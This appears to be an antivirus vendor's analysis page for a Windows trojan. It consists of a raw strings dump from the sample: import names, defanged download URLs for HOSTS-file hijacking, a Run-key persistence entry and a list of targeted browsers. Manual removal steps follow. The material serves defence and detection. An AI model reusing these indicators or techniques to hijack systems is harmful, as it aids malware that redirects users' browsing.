
!!!'''&&&###%%%

,,,%%% ###!!!"""

###'''"""

"""'''$$$ ###

''')))***,,,)))!!!&&&

$&&&%'&$$'''

%%f6   ***$$$!!!###!!!

#"&'&((&&!&%'%%,**###"""###!!!

! # "#!!!

$),)""" $$$!!!

"""'''&&&

%%%..."""

FFF???)))<<<;;;...EEEKKK999TTT```,,,

(((...CCCmmmdddddd222

'''(((''''&(!$!!"

###$$$"""

~~~```@@@

'''666''')))

000@@@~~~

)))***"""

'''.00,**)))%##

. )022230...'))

-&  ""!#

"'()(%!"$

###'''(((###

$$$%%%'''%%% ###(((***$$$ )))...!!!

$$$(((&&&)))---   ((($$$ &&&###

&&&***(((,,,   ,,,)))%%%""" $$$

*=@%CO

!'#$&&&$&&'''$$$'''"""

***55589=866

" !#%&"(((###"""###!!!

"""!!!%%%'''

'&(((('''&&&%%%###"""

!!!###%%%'''(((&&&$$$!!!$$$)))&&&###%%%'''###"""$$$!!!

%##%&#(((#%%&'$

$&&%$&(%#"($   ###"""###!!!

" () """ $$$!!!

'&()(%&')%%%%"$

---   ***___

888!!!888%%%...PPP

999'''555>>>

111"""===%%%

999///,,,

(((666((()))

'''000   )))$$$

---000222...)))

...qqq???

###((("""

!!!111!!!

!!!###%%%'''&&&

...;;;|||

"""''',,,"""

""")))***!!!

$$$%%%'''&&& ###)))***$$$ )))...!!!

$$$'''&&&)))---,,,((($$$ %%%###

!!!%%%!!!

$$$***,,,((($$$   &&&

$$$'''%%%### %%%$$$

&&&   '''!!! )))&&&

&&&!!!$$$

###&&&%%%

%%%(((***$$$"""&&&!!!

'''...111 ###

###%%% !!!$$$..."""((('''

%%33111

(((555;;;777

!!!###&&&)))&&&"""%%%'''   ,,,''',,,)))((('''###

"""...(((###&&&'''"""

!!!%%%   ((($$$ ###$$$%%%!!!

###''',,,%%%"""

###---)))!!!

''',,,!!!

%%% $$$%%%$$$

""")))''' $$$

"""'''###!!!$$$(((###

   """ %%%)))%%%((()))!!!

"""$$$(((###

&&&((('''&&&%%%###"""

###&&&(((,,,   ***)))&&&

!!!###%%%'''(((&&&$$$!!!$$$)))&&&$$$%%%'''###"""$$$!!!

)))""" """&&&###

!!!$$$###

'''&&&###%%%

!!!&&&(((&&&"""!!!

''')))***,,,(((!!!&&&

$$$%%%(((%%%&&&

%%%&&&%%%""",,,###"""###"""

!!!""" """(((""" $$$!!!

%%%---!!!

GGG@@@)))<<<;;;...FFFKKK999SSS___,,,

&&&"""'''&&&###

(((...CCCmmmdddccc222

'''&&&'''$$$"""

###%%%"""

-2!16 27!6:%7<(7?%<D&@G'CJ)EL,HO/KR/LS1NU2MW3NX3NX4PW7SY7SZ7R\6Q[6SZ5RY6RY8T[2NU4PW4PW4QX4PW5QX3OV4PW4PW4PW5QX4PW4PW7SZ8T[6RX8TZ7SY8TZ7SY6RY5QX4PW5QX3PW4PW3PV5QW3PW4PW4PW4PW3OV4PW7SY7SZ7SZ7SZ7SZ7SZ5RY7SZ3PV3OU4OY4PW4PW6PW4PW3OY3NX6PW5QX4OY5PZ5PZ4PW4PW4PW7SZ9SY7SY6RX7SY7SY8RX8T[.JT3NZ7QW7SY,LR

(.Vju

/4!08%4<%7<$9=%<C&@F)CI)EK,HO-JQ.JT1MW2OV2OV2OV3PW7SZ7SZ6RY6RY7T[6SZ6RY8T[3OV4PW4PW4PW3PW5QX3OV4PW3PW3PW3OV4PW4PV7SY7SY8TZ8TZ6RX8TZ8TZ7S]3OY4PW4PW3OV2OV4QX0PV3OV4PW3OV4PW5QX3OV7SZ7SZ8RY8RY6RY7SZ7T[7SZ5QX4PW4PW4PW6RY3OV4PW5QX2NU4QX4PV3OU4PW6PW6RY5QX5QX7SZ8TZ9U[6RY7SZ:T[7SZ7SZ/KR5PZ5OV8RY.KQ

]{~.JQ"<BY{

,1 05#38$49%7<'9>%<D(?G)CI EK,HO.JQ0LS2NU3OV3OV3OV4QW6RX7SZ7SZ7SZ8T[7SZ6RY7SZ5QX5QX4PW4PW4QX2OV4QX3PW4QW4QW3PV4QW6RY6RY7SZ7SZ6RY8T[7SZ7SZ7R\4OY3OY4QX2OV2OV3PW3PW4PV5QX4PW4PW4PW4PV5QW8TZ7R\6Q[7SZ8T[6SZ6SZ4PZ3OY4PW3OV7QX6PW5OV6PW3OV5QX3PV3PV3OU4PV4PV3OU4PV7SY6SZ7SZ7SZ7T[6SZ9U\5QX1MT3PW3PW6RX/HX

/// ???...XXX

"""###"""###"""!!!

~~~___^^^"""

......---...------...---...///......---......---...------...//////---...///...000EEECCCDDDCCC///111///333//////333555GGGHHHGGGGGG......111000///666<<<444000111000//////000...///...999FFFFFF@@@999333,,,111......---***...444;;;<<<>>>888,,,---...000000...,,,///,,,666MMMMMMLLLDDD888000111---...111---//////---///000------...LLLJJJMMMLLL---,,,...???MMMMMMKKK999,,,      ---...---/////////.........///---,,,   ------...000---      ---,,,DDD(((

((('''&&&))),,,)))(((

%%%***'''

<<<:::555444888

???<<<333555&&&

>>>@@@777888

...DDD;;;:::;;;777

...KKK@@@===@@@???!!!

...CCC

...TTTAAAAAABBBAAA!!!

...LLL

444\\\...

444,,,000---

...mmmjjjkkkllllllmmmnnnmmmlllllljjjmmmooommmkkkmmmkkkooolllnnnmmmlllccceeeeeebbb'''lllccc

$$$%%%###%%%###

)1.JQ

 0 .3"14"36#5:$8?$9=#=D&@G'BL)DN,HO-IP/KR2NU2NU3OV3OV5QX5QX7SZ6R\6R\7SY7SY7SZ7SZ5QW4PV4PW4OY4OY4OY4OY4OY4PW4PW4PV3OU3PW6SZ7T[6RY7SZ7SZ7SZ7SZ6RY5QW3OV4OY5QX3NX4NZ4OY4PZ4PW4PW3PW4PZ5QX7SY7SY7SZ7SZ7SZ7R\6SZ6RY4PW4PV4PW4PW4PW4QX3PW4QX3PV4PV4PW4PW4PW4PW4PW4PW5QX9SZ7SZ8TZ8TZ7SY7SY8T[6Q[/JT3PW1QV7Q].KQ

-IZ.J[.KZ0JZ'>T

.1!25"27!38&8=%:>&=E%?F EL)DN-HR-HR0JV1KW1NT3OU3OU4PV6SV6SV6RX:TZ7T[6SZ5QX8T[2NU6RY4PW4PW4OY5PZ2LX5O[5O[3MY5O[4NZ5QW6RX7SY8TZ6RX7SY6RX7SY7R\6Q[4OY1NU4PZ4PZ4PZ5QX4PW5QX4PW5QX4PW4PW8TZ7SY7SY7SZ7SZ7SY6RX6RX4PW4PW4PW3OV6PW6PW4PW4PW2NT5QW3PW3PW4OY5PZ3NX3MY5PZ6Q[8TZ6RX7SY8TZ8U[7SY7SY.JQ3QT2NX9TW.IS

,/!/4"14"36%5:&8=$9=#=D&@G'BL)DN,HO.JQ/KR1MT2NU3OV3OV5QX4QX7SZ6R\6R\7SY7SY7SZ7SY5QW4PV4PW3OY4OY3NX3NX4OY4PW4PV4PV3OV4PW6RY7SZ6RY7SZ7SZ7SZ6RY6RY5QX4PW4NZ4QX4OY3OY3PW5RY4PW3PW3OY3PW4PW7SY7SZ7SZ7SZ7SZ7SZ7SZ6RY4PV4PV4PV4PW4PV2OV3PW3PV3PW4PV4PW3PW3PW3PW4PW4PW5QX7SZ7SZ8TZ8TZ7SY7SY8T[6Q[/JT3PW1QV7Q].KQ

&CR(CW'AQ DT*BT.EU)GS*DQ*CS'@R*DQ

.Xu1GY.KZ.I]

.GY1GY-IZ*IX&?O

$$$&&&###"""$$$

...###@@@...YYY

***,,,000

///...

!!!111000555444\\\

###222777

)))444666999444

999777;;;888

666555!!!

666...888;;;[[[

888:::===???

666222;;;???^^^

Ýdlllnnnlllkkklllmmmlllmmmmmmkkkkkklllmmmmmmmmmnnnnnnkkknnnmmmkkkmmmuuu

}}}___```

$$$%%%$$$%%%$$$

\\\hhhppp111''' *** ===...ZZZ

}}}---,,,

(7),01444

'9=82<.342

9T.mn,

%fkk4

{`.cF

-.VU2

1975/08/21

, #&')*)

-0-(0%()(

.In4i.o-

1900/01/01

2007:02:07 02:59:30

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

F%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

iphlpapi.dll

MPR.dll

VERSION.dll

.PAVCException@@

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

\\.\Scsi0:

\\.\PhysicalDrive0

%s:%d

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

(*.htm;*.html)|*.htm;*.html

its:%s::%s

x86 Family %s Model %s Stepping %s

X-X-X-X

.PAVCOleException@@

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCOleDispatchException@@

.PAVCArchiveException@@

c:\%original file name%.exe

deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly

inflate 1.2.3 Copyright 1995-2005 Mark Adler

#include "l.chs\afxres.rc" // Standard components

WinExec

RegCreateKeyA

RegCreateKeyExA

GetViewportExtEx

GetViewportOrgEx

ScaleViewportExtEx

SetViewportExtEx

OffsetViewportOrgEx

SetViewportOrgEx

GetKeyState

GetKeyboardType

CreateDialogIndirectParamA

UnhookWindowsHookEx

SetWindowsHookExA

1.0.0.0

windowswf

@api-ms-win-core-synch-l1-2-0.dll

mscoree.dll

ext-ms-win-ntuser-windowstation-l1-1-0

portuguese-brazilian

\SYSTEM\CurrentControlSet\Services\%s

\Drivers\*.sys

1.0.0.1

_ChangePassword

(*.*)

2bcd58.exe_3416:

`.rsrc

t$(SSh

~%UVW

u$SShe

Jiu2.iup

1wK(.wS

user32.dll

kernel32.dll

Kernel32.dll

OLEACC.DLL

ws2_32.dll

TCPHeader

windowswf

hXXp://VVV.hqkjwy.com:88/hosts1.txt

%System%\drivers\etc\hosts

# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.

# 102.54.94.97 rhino.acme.com # source server

# 38.25.63.10 x.acme.com # x client host

127.0.0.1 localhost

hXXp://VVV.hqkjwy.com:88/dk.txt

@SOFTWARE\Microsoft\Windows\CurrentVersion\Run\

z>Windows 2000

@Windows XP

@Windows 2003

@Windows Vista

@Windows 7

@Windows 8

WinHttp.WinHttpRequest.5.1

HTTP/1.1

hXXp://

iexplore.exe

liebao.exe

maxthon.exe

360se.exe

2345Explorer.exe|2345EX~1.EXE

firefox.exe

hao123Juzi.exe

SogouExplorer.exe

QQBrowser.exe

opera.exe

TaoBrowser.exe

Chrome_OmniboxView

TangoWeb.exe

TheWorld.exe

UCBrowser.exe

baidubrowser.exe

360chrome.exe

TTraveler.exe

|liebao.exe|vary.exe|went.exe|miniie.exe|cpopmus32ex.exe|crowd.exe|slowt32ex.exe|

f1browser.exe

2345chrome.exe

chrome.exe

&7http

VBScript.RegExp

%d&&'

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

F%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

iphlpapi.dll

SHLWAPI.dll

MPR.dll

VERSION.dll

WSOCK32.dll

.PAVCException@@

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

packet.dll

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

HTTP/1.0

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

;3 #>6.&

'2, / 0&7!4-)1#

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCArchiveException@@

zcÁ

C:\Windows\system32\2bcd58.exe

#include "l.chs\afxres.rc" // Standard components

GetCPInfo

WinExec

GetProcessHeap

RegCloseKey

RegOpenKeyExA

RegCreateKeyA

RegDeleteKeyA

RegCreateKeyExA

GetViewportExtEx

GetViewportOrgEx

ScaleViewportExtEx

SetViewportExtEx

OffsetViewportOrgEx

SetViewportOrgEx

ShellExecuteA

GetKeyState

SetWindowsHookExA

UnhookWindowsHookEx

GetKeyboardLayout

VkKeyScanExA

keybd_event

CreateDialogIndirectParamA

InternetCanonicalizeUrlA

InternetCrackUrlA

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

.text

`.rdata

@.data

.rsrc

UrlA3%

}.mKK;

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>PAD

KERNEL32.DLL

ADVAPI32.dll

COMCTL32.dll

comdlg32.dll

GDI32.dll

ole32.dll

OLEAUT32.dll

RASAPI32.dll

SHELL32.dll

USER32.dll

WININET.dll

WINMM.dll

WINSPOOL.DRV

WS2_32.dll

(*.*)

1.0.0.0

2bcd58.exe_3416_rwx_00401000_000EF000:

t$(SSh

~%UVW

u$SShe

Jiu2.iup

1wK(.wS

user32.dll

kernel32.dll

Kernel32.dll

OLEACC.DLL

ws2_32.dll

TCPHeader

windowswf

hXXp://VVV.hqkjwy.com:88/hosts1.txt

%System%\drivers\etc\hosts

# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.

# 102.54.94.97 rhino.acme.com # source server

# 38.25.63.10 x.acme.com # x client host

127.0.0.1 localhost

hXXp://VVV.hqkjwy.com:88/dk.txt

@SOFTWARE\Microsoft\Windows\CurrentVersion\Run\

z>Windows 2000

@Windows XP

@Windows 2003

@Windows Vista

@Windows 7

@Windows 8

WinHttp.WinHttpRequest.5.1

HTTP/1.1

hXXp://

iexplore.exe

liebao.exe

maxthon.exe

360se.exe

2345Explorer.exe|2345EX~1.EXE

firefox.exe

hao123Juzi.exe

SogouExplorer.exe

QQBrowser.exe

opera.exe

TaoBrowser.exe

Chrome_OmniboxView

TangoWeb.exe

TheWorld.exe

UCBrowser.exe

baidubrowser.exe

360chrome.exe

TTraveler.exe

|liebao.exe|vary.exe|went.exe|miniie.exe|cpopmus32ex.exe|crowd.exe|slowt32ex.exe|

f1browser.exe

2345chrome.exe

chrome.exe

&7http

VBScript.RegExp

%d&&'

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

F%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

iphlpapi.dll

SHLWAPI.dll

MPR.dll

VERSION.dll

WSOCK32.dll

.PAVCException@@

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

packet.dll

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

HTTP/1.0

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

;3 #>6.&

'2, / 0&7!4-)1#

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCArchiveException@@

zcÁ

C:\Windows\system32\2bcd58.exe

#include "l.chs\afxres.rc" // Standard components

GetCPInfo

WinExec

GetProcessHeap

RegCloseKey

RegOpenKeyExA

RegCreateKeyA

RegDeleteKeyA

RegCreateKeyExA

GetViewportExtEx

GetViewportOrgEx

ScaleViewportExtEx

SetViewportExtEx

OffsetViewportOrgEx

SetViewportOrgEx

ShellExecuteA

GetKeyState

SetWindowsHookExA

UnhookWindowsHookEx

GetKeyboardLayout

VkKeyScanExA

keybd_event

CreateDialogIndirectParamA

InternetCanonicalizeUrlA

InternetCrackUrlA

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

.text

`.rdata

@.data

.rsrc

(*.*)

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Scan a system with an anti-rootkit tool.
Terminate malicious process(es) (How to End a Process With the Task Manager):

29c2bf.exe:1480
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Config[1].rar (230 bytes)
C:\Windows\System32\drivers\UnlockCallback.sys (5 bytes)
C:\Windows\Temp\1.sys.rar (1810 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\SafeWall[1].rar (2765 bytes)
C:\Windows\Temp\Config.dat (230 bytes)
C:\Windows\System32\2bcd58.exe (678 bytes)
C:\Windows\29c2bf.exe (586 bytes)
C:\Windows\System32\drivers\etc\hosts (826 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"windowswf" = "C:\Windows\system32\2bcd58.exe"
Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Trojan.Win32.FlyStudio_b6e34f92da

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Trojan.Win32.FlyStudio_b6e34f92da

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet